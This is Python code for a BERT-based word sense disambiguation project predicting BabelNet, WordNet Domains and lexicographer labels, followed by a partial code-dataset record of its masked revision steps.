:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else "factotum"
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) -> str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
def __decide_pos(pos: str) -> str:
"""
Decides the WN representation of the given pos in input
:param pos: the pos to interpret with WordNet
:return: the WN representation of the given pos
"""
to_return = None
if pos == 'NOUN':
to_return = "n"
if pos == 'VERB':
to_return = 'v'
if pos == 'ADJ':
to_return = 'a'
if pos == 'ADV':
to_return = 'r'
return to_return
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:
"""
Cast the given list (which contains only WN ids) to Babelnet IDs
:param list_of_bn: the list to cast
:param vocab: the vocabulary to use to perform the conversion
:return: the converted list
"""
list_of_possible_senses_bn_version = []
for candidate in list_of_bn:
is_it_here = next(key for key, value in vocab.items() if candidate in value)
if is_it_here:
list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])
return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:
"""
Converts the list of babelnet IDS to a number and outputs the converted list
:param list_of_possible_senses: the list that contains all the babelnet's IDs
:param word: the word for which we are predicting the sense in a specific moment
:param vocab: the vocabulary Word -> Serial to exploit for the conversion
:param predictions: the predictions made by the system
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:
1 --> The flow will still be the same
2,3 -> Flow will change, triggering the first step for the coarse-grained approach.
:return: a List with the IDs converted
"""
to_return = []
list_of_indices_to_delete = []
for indice in range(len(list_of_possible_senses)):
new_string = word + "_" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice]
conversion = None
try:
conversion = int(vocab[new_string])
to_return.append(predictions[conversion])
except:
list_of_indices_to_delete.append(indice)
continue
if list_of_indices_to_delete:
list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete]
return to_return, list_of_possible_senses
if __name__ == "__main__":
predict_babelnet("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
#predict_wordnet_domains("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
#predict_lexicographer("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
|
flexible
|
{
"blob_id": "e3631a2a003f98fbf05c45a019250e76d3366949",
"index": 2582,
"step-1": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\n<mask token>\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n 